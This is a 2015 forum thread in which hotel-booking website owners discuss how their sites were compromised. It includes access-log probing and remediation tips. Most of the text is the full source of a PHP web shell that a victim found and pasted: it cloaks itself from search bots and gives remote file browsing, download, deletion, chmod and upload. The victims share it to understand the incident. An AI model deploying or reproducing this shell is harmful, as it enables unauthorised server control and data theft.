Page 1 of 3

[SOLVED] Information about security updates?

Posted: Mar 26th, '15, 20:41
by paavon
Since i never didnt saw any security information or updates, i didnt update our site because its was littlebit too much modified. Im pretty sure that it was mostly just translation and layout and something connected that, but i will check anyway later what i modified. Don't really remember anymore. ... =changelog this is not saying anything about security so i was thinking that it would be quite safe... suddenly, today morning our web page was closed because of hacking. Didnt yet get any additional information, was it sending spam or how they figured it out, they didnt answer yet.

And i found a few intresting files from our public_html folder, we dont have anything else than hotel site installed so it can be only injected from hotel site. And virtual hosts are isolated from each other.

-rw-r--r-- 1 user group 24980 Mar 25 19:07 systemscash.php
-rw-r--r-- 1 user group 21341 Mar 25 20:36 sh.php
-rw-r--r-- 1 user group 307858 Mar 25 22:36 language-pref.php

I know, our version is ancient. Hotel Site version 3.6.1 with Jaune 2.0.8. Template. We bought 2.3.2 about 4 years ago and I updated it later.

But my question is. Because this old hotel site seems not be secure, but are this fixed in newer version? Since i couldnt find any information anywhere and because newest version is anyway likely 1.5 years old too....

And instead of buying this software, i would be intresting just buying it just as service which i could integrate to own page just like newest version seems offer but it could be much more simplifier version too, just booking, nothing else. Because i would like use other content management system anyway and would not like worry about hotel site installation.

Re: Information about security updates?

Posted: Mar 28th, '15, 13:58
by akis
today morning our web page was closed because of hacking too!?:shock:
Our version is 4.2.9 with ssl certificate
Τhe same folders were to us and a folder info

Needs upgrading immediately!!

Re: Information about security updates?

Posted: Mar 28th, '15, 14:11
by paavon
And there was infected license.php file too.

I removed those infected files and replaced modules directory with clean, not really know if that modules directory was even infected. Didnt examine it yet. Hosting operator said that their automated scanner founded malicious files. I really have do reinstall but there is a few problems so didnt do it yet.

Site is now moved to another server and running there, while im trying monitoring logs/file changes and waiting if its happening again, atleast i saw some a few request lately for those infected files (which i removed) but so far nothing happened.

If developers want see those malicious files, i can send them.

Re: Information about security updates?

Posted: Mar 28th, '15, 16:14
by akis
I think it is better to do the following
1. Change all the passwords (Check if there are other users so you must delete them.)
2. Also change the logins to the database (The data shown in config files).
3. Erases all files, ALL, and upload an old backup. On this backup put the new codes for the database.

Re: Information about security updates?

Posted: Mar 28th, '15, 20:03
by gygy42
My website was also hacked and the same issue...
It doesn't help to change the password and the files, it must be a a vulnerability of the script and the hacker will continue event after clean install...
The admin may find a solution before all the websites are infected...

Re: Information about security updates?

Posted: Mar 28th, '15, 20:47
by gygy42
I found this by typing "hotel yokurce" on google

I don't know exactly but in the file there is something about "In the name of Allah, the Beneficent, the Merciful" ...

And with an other search engine (duckduckgo)

etc... tons of websites

Re: Information about security updates?

Posted: Mar 28th, '15, 21:09
by gygy42
The hacker is from Korea or at least the IP - [27/Mar/2015:22:01:07 +0000] "GET /muieblackcat HTTP/1.1" 404 288 "-" "-" - [27/Mar/2015:22:01:08 +0000] "GET /index.php HTTP/1.1" 200 22160 "-" "-" - [27/Mar/2015:22:01:10 +0000] "GET /admin/index.php HTTP/1.1" 403 295 "-" "-" - [27/Mar/2015:22:01:10 +0000] "GET /admin/pma/index.php HTTP/1.1" 403 299 "-" "-" - [27/Mar/2015:22:01:11 +0000] "GET /admin/phpmyadmin/index.php HTTP/1.1" 403 306 "-" "-" - [27/Mar/2015:22:01:11 +0000] "GET /db/index.php HTTP/1.1" 200 22187 "-" "-" - [27/Mar/2015:22:01:12 +0000] "GET /dbadmin/index.php HTTP/1.1" 404 293 "-" "-" - [27/Mar/2015:22:01:13 +0000] "GET /myadmin/index.php HTTP/1.1" 404 293 "-" "-" - [27/Mar/2015:22:01:19 +0000] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 302 "-" "-" - [27/Mar/2015:22:02:05 +0000] "GET /phpMyAdmin-2.2.3/index.php HTTP/1.1" 404 302 "-" "-" - [27/Mar/2015:22:02:06 +0000] "GET /phpMyAdmin-2.2.6/index.php HTTP/1.1" 404 302 "-" "-" - [27/Mar/2015:22:02:06 +0000] "GET /phpMyAdmin-2.5.1/index.php HTTP/1.1" 404 302 "-" "-"

Re: Information about security updates?

Posted: Mar 28th, '15, 21:12
by gygy42
and he put a malware in the admin folder called log.php

here the code

Code: Select all

if(!empty($_SERVER['HTTP_USER_AGENT'])) { $v2045f746 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "StackRambler"); if(preg_match('/' . implode('|', $v2045f746) . '/i', @$_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); if(@get_magic_quotes_gpc()) $_POST = n0182dfe8($_POST); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); define("DEFAULT_DIR_DEEP_BACK","3"); if(isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']); if(isset($_POST['p3'])) $_POST['p3'] = urldecode($_POST['p3']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".@basename($_POST['p1'])); if (function_exists("mime_content_type")) { $v599dcce2 = @n85ced157($_POST['p1']); header("Content-Type: " . $v599dcce2); } else header("Content-Type: application/octet-stream"); $v0666f0ac = @fopen($_POST['p1'], "r"); if($v0666f0ac) { while(!@feof($v0666f0ac)) echo @fread($v0666f0ac, 1024); @fclose($v0666f0ac); } } exit; } elseif (@$_POST['p2']=='delete') { if (@is_dir($_POST['p1'])) @n46aa46af($_POST['p1']); else @unlink($_POST['p1']); } elseif (@$_POST['p2']=='chmod') { $v58f57b98 = 0; for($v865c0c0b=strlen($_POST['p1'])-1;$v865c0c0b>=0;--$v865c0c0b) $v58f57b98 += (int)$_POST['p3'][$v865c0c0b]*pow(8, (strlen($_POST['p3'])-$v865c0c0b-1)); if(!@chmod($_POST['p1'], $v58f57b98)) echo 'Can\'t set permissions!<br>'; } elseif (@$_POST['p2']=='mkdir') { if(!@mkdir($_POST['p1'])) echo 'Can\'t create new dir<br><script>"";</script>'; } elseif (@$_POST['p2']=='uploadFile') { if(!@move_uploaded_file(@$_FILES['f']['tmp_name'], $_POST['p3'].@$_FILES['f']['name'])) echo 'Can\'t upload file!<br><script>"";</script>'; } if (isset($_REQUEST['sf']) and $_REQUEST['sf']==0) $v2e0a881e = false; else $v2e0a881e = true; if (isset($_REQUEST['showro']) and $_REQUEST['showro']==0) $v8a40bf93 = false; else $v8a40bf93 = true; echo "
body,td,th{ border:1px outset black;font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }{ border-left:5px solid #df5;color:#fff;background-color:#000028; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
div.content{ padding: 7px;margin-left:7px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
input{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#003300;}
.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}
var p1_ = '".((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars(@$_POST['p1'],ENT_QUOTES))."';
var p2_ = '".((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars(@$_POST['p2'],ENT_QUOTES))."';
var p3_ = '".((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars(@$_POST['p3'],ENT_QUOTES))."';
var d = document;
function set(p1,p2,p3) {
function g(p1,p2,p3) {
<form method=post name=fm style='display:none;'>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
"; if (!function_exists("posix_getpwuid") && !in_array('posix_getpwuid', $v619d75f8)) { function posix_getpwuid($v83878c91) { return false; } } if (!function_exists("posix_getgrgid") && !in_array('posix_getgrgid', $v619d75f8)) { function posix_getgrgid($v83878c91) { return false; } } $v10963336 = @getcwd().DIRECTORY_SEPARATOR; $va9cc6a00 = @diskfreespace($v10963336); $vdb28f3b2 = @disk_total_space($v10963336); $vdb28f3b2 = $vdb28f3b2?$vdb28f3b2:1; if(!function_exists('posix_getegid')) { $vee11cbb1 = @get_current_user(); $v9871d3a2 = @getmyuid(); $v2d53a8fb = @getmygid(); $vdb0f6f37 = "?"; } else { $v9871d3a2 = @posix_getpwuid(@posix_geteuid()); $v2d53a8fb = @posix_getgrgid(@posix_getegid()); $vee11cbb1 = $v9871d3a2['name']; $vdb0f6f37 = $v2d53a8fb['name']; $v9871d3a2 = $v9871d3a2['uid']?$v9871d3a2['uid']:@posix_geteuid(); $v2d53a8fb = $v2d53a8fb['gid']?$v2d53a8fb['gid']:@posix_getegid(); } $v693ee6e5 = count(explode('/', @$_SERVER["REQUEST_URI"])) - 2; if ($v693ee6e5 > DEFAULT_DIR_DEEP_BACK) $v693ee6e5 = DEFAULT_DIR_DEEP_BACK; print "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>PHP:<br>Disabled:<br>HDD:<br>Site:<br>Root:<br>CWD:</span></td><td><nobr>".@php_uname()."</nobr><br>".$v9871d3a2.' ( '.$vee11cbb1.' ) <span>Group:</span> '.$v2d53a8fb.' ( '.$vdb0f6f37.' )<br>'.@phpversion().' <span>Safe mode:</span> ' . (@ini_get('safe_mode')?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'\',\'info\')">[ phpinfo ]</a> '.' <span>Datetime:</span> ' . date('Y-m-d H:i:s')."<br><nobr>".implode(",", $v619d75f8)."</nobr><br>".n25d3ae48($vdb28f3b2) . ' <span>Free:</span> ' . n25d3ae48($va9cc6a00) . ' ('. (int) ($va9cc6a00/$vdb28f3b2*100) . "%)<br><a href=\"http://".@$_SERVER['HTTP_HOST']."/\">http://".@$_SERVER['HTTP_HOST']."/</a><br>".htmlspecialchars(realpath(@$_SERVER['DOCUMENT_ROOT']).DIRECTORY_SEPARATOR)."<br>".htmlspecialchars($v10963336)." <a href='".@$_SERVER["REQUEST_URI"]."'>[ home ]</a></td><td align='right' width=10%><span>Server IP:</span><br>".@$_SERVER["SERVER_ADDR"]."<br><span>Client IP:</span><br>".@$_SERVER["REMOTE_ADDR"]."<br>deep = $v693ee6e5</td></tr></table>\n"; if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style><a href="'.@$_SERVER["REQUEST_URI"].'">BACK</a>'; ob_start(); phpinfo(); $vfa816edb = ob_get_clean(); $vfa816edb = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$vfa816edb); $vfa816edb = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$vfa816edb); echo str_replace('<h1','<h2', $vfa816edb) .'</div><br>'; exit; } $v10ae9fc7 = @n643462d4($v10963336, $v2e0a881e); if ($v693ee6e5 > 0) { $v73600783 = $v10963336.DIRECTORY_SEPARATOR.'..'; for ($v865c0c0b=1; $v865c0c0b <= $v693ee6e5; $v865c0c0b++) { $v10ae9fc7 = array_unique(array_merge($v10ae9fc7, n97fe6a35("$v73600783", $v2e0a881e))); $v73600783 = $v73600783.DIRECTORY_SEPARATOR.'..'; } } print '<script>p1_=p2_=p3_="";</script>
<div class=content>
<table class="main" cellpadding="2" cellspacing="0" width="100%">
'; $v2db95e8e = 0; foreach ($v10ae9fc7 as $v73600783) { if (@is_writable($v73600783)) $v9acb4454="<font color='green'>RW</font>"; else if ($v8a40bf93) $v9acb4454="<font color='red'>RO</font>"; else continue; $v72122ce9 = @posix_getpwuid(@fileowner($v73600783)); $vdb0f6f37 = @posix_getgrgid(@filegroup($v73600783)); $vb515e18a = $v72122ce9['name']?$v72122ce9['name']:@fileowner($v73600783); $vaae3c716 = $vdb0f6f37['name']?$vdb0f6f37['name']:@filegroup($v73600783); $v58f57b98 = substr(sprintf('%o', @fileperms($v73600783)), -4); $v8f45a264 = date('Y-m-d H:i:s', @filemtime($v73600783)); if (@is_dir($v73600783)){ $v9407b494 = "[ $v73600783 ]"; $vf7bd60b7 = "<span>DIR</span>"; } else { $vf7bd60b7 = n25d3ae48(@filesize($v73600783)); $v9407b494 = "$v73600783"; } print "<tr".($v2db95e8e?' class=l1':'')."><td><span>$v9acb4454</span></td><td><b><span>".htmlspecialchars($v9407b494)."</span></b></td><td>$vf7bd60b7</td><td>$v8f45a264</td><td>$vb515e18a/$vaae3c716</td><td>$v58f57b98</td><td>"; if (!@is_dir($v73600783)) print "<a title=\"Download\" href=\"#\" onclick=\"g('".urlencode($v73600783)."','download')\">D</a>"; print " <a title=\"Remove\" href=\"#\" onclick=\"g('".urlencode($v73600783)."','delete')\">R</a></td></tr>\n"; $v2db95e8e = $v2db95e8e?0:1; } print "
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr><td><form method=post onsubmit=\"g(this.m.value,'mkdir');return false;\"><span>Make dir:</span><br><input class='toolsInp' type=text name=m value='".htmlspecialchars($v10963336)."'><input type=submit value='>>'></form></td></tr>
<tr><td><form method=post onsubmit=\"g(this.d.value,'delete');return false;\"><span>Delete (file or dir):</span><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td></tr>
<tr><td><form method=post><span>Chmod:</span>
<input type=hidden name=p2 value='chmod'><br>
File or dir : <input class='toolsInp' type=text name=p1 value='".htmlspecialchars($v10963336)."'><br>
<input type=text size=6 name=p3 value='0755'>
<input type=submit value='>>'></form></td></tr>
<tr><td><form method='post' ENCTYPE='multipart/form-data'>
<span>Upload file:</span><br>
<input type=hidden name=p2 value='uploadFile'>
Path : <input class='toolsInp' type=text name=p3 value='".htmlspecialchars($v10963336)."'><br>
<input class='toolsInp' type=file name=f>
<input type=submit value='>>'></form><br></td></tr>
"; function n7d8f77be($v73600783) { $v700f6fa0 = @opendir($v73600783); while (false !== ($v435ed7e9 = @readdir($v700f6fa0))) $v45b96339[] = $v435ed7e9; return $v45b96339; } function n643462d4($v73600783, $v2e0a881e=true) { if(!function_exists("scandir")) $v63a9f0ea = array_diff(@n7d8f77be($v73600783), array('.', '..')); else $v63a9f0ea = array_diff(@scandir($v73600783), array('.', '..')); foreach($v63a9f0ea as $v2063c160) { if($v2063c160 === '.' || $v2063c160 === '..') continue; if(@is_file($v73600783.DIRECTORY_SEPARATOR.$v2063c160) && $v2e0a881e) { $vb4a88417[]=@realpath($v73600783.DIRECTORY_SEPARATOR.$v2063c160);continue; } elseif(@is_dir($v73600783.DIRECTORY_SEPARATOR.$v2063c160)) $vb4a88417[]=@realpath($v73600783.DIRECTORY_SEPARATOR.$v2063c160).DIRECTORY_SEPARATOR; else continue; foreach(@n643462d4($v73600783.DIRECTORY_SEPARATOR.$v2063c160, $v2e0a881e) as $v2063c160) $vb4a88417[]=$v2063c160; } return $vb4a88417; } function n97fe6a35($v73600783, $v2e0a881e=true) { if (false == ($v700f6fa0 = @opendir($v73600783))) return array(); while (false !== ($v435ed7e9 = @readdir($v700f6fa0))) if ($v435ed7e9 != '..' and @is_dir($v73600783.DIRECTORY_SEPARATOR.$v435ed7e9)) $v45b96339[] = @realpath($v73600783.DIRECTORY_SEPARATOR.$v435ed7e9).DIRECTORY_SEPARATOR; elseif ($v2e0a881e and $v435ed7e9 != '..' and @is_file($v73600783.DIRECTORY_SEPARATOR.$v435ed7e9)) $v45b96339[] = @realpath($v73600783.DIRECTORY_SEPARATOR.$v435ed7e9); @closedir($v700f6fa0); return $v45b96339; } function n46aa46af($v73600783) { foreach(glob($v73600783 . '/*') as $v8c7dd922) { if(@is_dir($v8c7dd922)) n46aa46af($v8c7dd922); else @unlink($v8c7dd922); } @rmdir($v73600783); } function n25d3ae48($v03c7c0ac) { if($v03c7c0ac >= 1073741824) return sprintf('%1.2f', $v03c7c0ac / 1073741824 ). ' GB'; elseif($v03c7c0ac >= 1048576) return sprintf('%1.2f', $v03c7c0ac / 1048576 ) . ' MB'; elseif($v03c7c0ac >= 1024) return sprintf('%1.2f', $v03c7c0ac / 1024 ) . ' KB'; else return $v03c7c0ac . ' B'; } function n0182dfe8($ve04aa510) { if (is_string($ve04aa510)) return stripslashes($ve04aa510); if (is_array($ve04aa510)) foreach($ve04aa510 as $v865c0c0b => $v2063c160) $ve04aa510[$v865c0c0b] = n0182dfe8($v2063c160); return $ve04aa510 ; } ?>

Re: Information about security updates?

Posted: Mar 29th, '15, 07:26
by gygy42
I'am pretty sur he robed the database and all the credit card info...
It would be great to have some news from the site admin!

Re: Information about security updates?

Posted: Mar 29th, '15, 17:59
by administrator
Please contact our Support Center and provide all needed information = access to yuor site, so we could check this issue.
Also - change all FTP logins and password to yuor site.